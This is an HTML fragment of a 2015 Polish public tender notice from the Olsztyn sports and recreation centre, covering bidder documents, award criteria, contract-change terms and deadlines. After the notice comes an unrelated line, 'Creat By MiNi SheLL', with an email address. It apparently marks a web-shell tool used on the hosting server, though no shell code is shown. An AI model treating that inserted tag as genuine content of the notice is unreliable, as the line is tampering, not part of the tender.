<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Kwestionariusz oferty zał. nr 1 do SIWZ.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Doświadczenie Wykonawcy - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>4.1.Zakazuje się istotnych zmian postanowień zawartej umowy oraz wprowadzania nowych postanowień do umowy, niekorzystnych dla Zamawiającego stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, chyba zamawiający przewidział możliwość dokonania takiej zmiany w ogłoszeniu o zamówieniu lub w SIWZ oraz określił warunki takiej zmiany. Zmiana umowy dokonana z naruszeniem tego przepisu jest nieważna, z zastrzeżeniem ust. 4 pkt. 4.2. - 4.5. i ust. 5, 6, 8 poniżej. 4.2.Zamawiający zastrzega sobie w uzasadnionych przypadkach, w szczególności  zamknięcia obiektu  przez służby sanitarno-epidemiologiczne lub nadzoru budowlanego, a także z powodu przerw technologicznych i awarii prawo  skrócenia okresu trwania umowy i zmniejszenia wynagrodzenia tj. wypłaty w takim przypadku wynagrodzenia za okres  faktycznego świadczenia usług. 4.3.Zamawiający zastrzega sobie, że w przypadkach szczególnych - np. ograniczonej kwoty środków finansowych przeznaczonych na realizację przedmiotu zamówienia, zmian organizacyjnych  u Zamawiającego , zmian czasu pracy WCRS,  będzie miał prawo w  trakcie realizacji ograniczyć zakres rzeczowy usługi bez żadnych skutków prawno - finansowych  lub odstąpić od umowy w części.  W takim przypadku wykonawcy przysługiwać będzie wynagrodzenie za faktycznie zrealizowane usługi. 4.4.	Zakazuje się istotnych zmian postanowień zawartej umowy oraz wprowadzania nowych postanowień do umowy, niekorzystnych dla zamawiającego, w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, chyba że konieczność wprowadzenia takich zmian wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy, w tym zmiany przepisów prawa, z zastrzeżeniem, że Zamawiający nie dopuszcza zmiany wynagrodzenia w przypadku zmiany stawki podatku VAT. 4.5. Zamawiający zastrzega sobie prawo zmian umowy, gdy zmiany te będą korzystne dla Zamawiającego  i nie będą wprowadzane warunki, które gdyby zostały ujęte w ramach procedury przetargowej udzielenia zamówienia umożliwiłyby dopuszczenie innych ofert niż ta, która pierwotnie została dopuszczona;  modyfikowałyby równowagę ekonomiczną umowy na korzyść Wykonawcy w sposób, który nie był przewidziany w postanowieniach pierwotnego zamówienia. 5. Zamawiający zastrzega sobie prawo skrócenia okresu świadczenia usług i trwania umowy oraz  odstąpienia od umowy w całości lub w części z powodu siły wyższej i zdarzeń losowych w szczególności zagrażających życiu lub zdrowiu ludzi albo grożących powstaniem znacznej szkody,  w przypadku nie uzyskania zgody Instytucji Zarządzającej na zmianę wskaźnika zatrudnienia w WCRS, a także zaleceń tej instytucji i innych organów kontroli lub organów Gminy Olsztyn. W takim przypadku oświadczenie o rozwiązaniu lub odstąpieniu od umowy Zamawiający złoży Wykonawcy w terminie 14 dni od powzięcia wiadomości o przyczynie. W przypadku odstąpienia od umowy lub jej rozwiązaniu z przyczyn wskazanych powyżej Wykonawcy przysługiwać będzie jedynie wynagrodzenie za faktycznie świadczone usługi bez jakichkolwiek innych roszczeń. 6. Zamawiający zastrzega sobie ponadto prawo odstąpienia od umowy w każdym czasie, bez wypowiedzenia w przypadku: 1)likwidacji Wykonawcy; 2)wydania nakazu zajęcia majątku Wykonawcy; -  w terminie do 14 dni od daty powzięcia wiadomości o zaistnieniu ww. okoliczności. 7. W razie wystąpienia istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy, Zamawiający może odstąpić od umowy w terminie 30 dni od powzięcia wiadomości o tych okolicznościach. W takim przypadku Wykonawca może żądać wynagrodzenia należnego mu z tytułu wykonania części umowy. 8.Zamawiający może rozwiązać umowę bez zachowania okresu wypowiedzenia lub odstąpić od umowy w przypadku naruszenia przez Wykonawcę obowiązków  wymienionych w § 2 umowy (Załącznik nr 3 do SIWZ)</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.osir.olsztyn.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Ośrodek Sportu i Rekreacji w Olsztynie, 10-558 Olsztyn, ul.l Żołnierska 13a.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.12.2015 godzina 13:00, miejsce: Ośrodek Sportu i Rekreacji w Olsztynie, 10-558 Olsztyn, ul. Żołnierska 13a, pokój nr 4.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com